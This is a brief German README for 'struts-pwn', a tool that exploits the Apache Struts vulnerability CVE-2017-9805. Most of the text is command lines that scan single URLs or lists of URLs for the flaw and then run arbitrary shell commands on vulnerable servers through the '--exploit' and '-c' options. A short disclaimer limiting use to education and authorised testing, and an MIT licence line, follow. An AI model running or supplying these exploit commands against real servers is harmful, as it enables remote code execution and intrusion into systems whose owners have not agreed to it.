
Ein Exploit für Apache Struts CVE-2017-9805
python apache-struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python apache-struts-pwn.py --list 'urls.txt'
python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'
python apache-struts-pwn.py --exploit --list 'urls.txt' -c 'echo test > /tmp/apache-struts-pwn'
Dieses Projekt wurde ausschließlich für Bildungs- und ethische Testzwecke erstellt. Die Verwendung von struts-pwn zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keinerlei Haftung und sind nicht für Missbrauch oder durch dieses Programm verursachte Schäden verantwortlich.
Das Projekt ist unter der MIT-Lizenz lizenziert.
Mazin Ahmed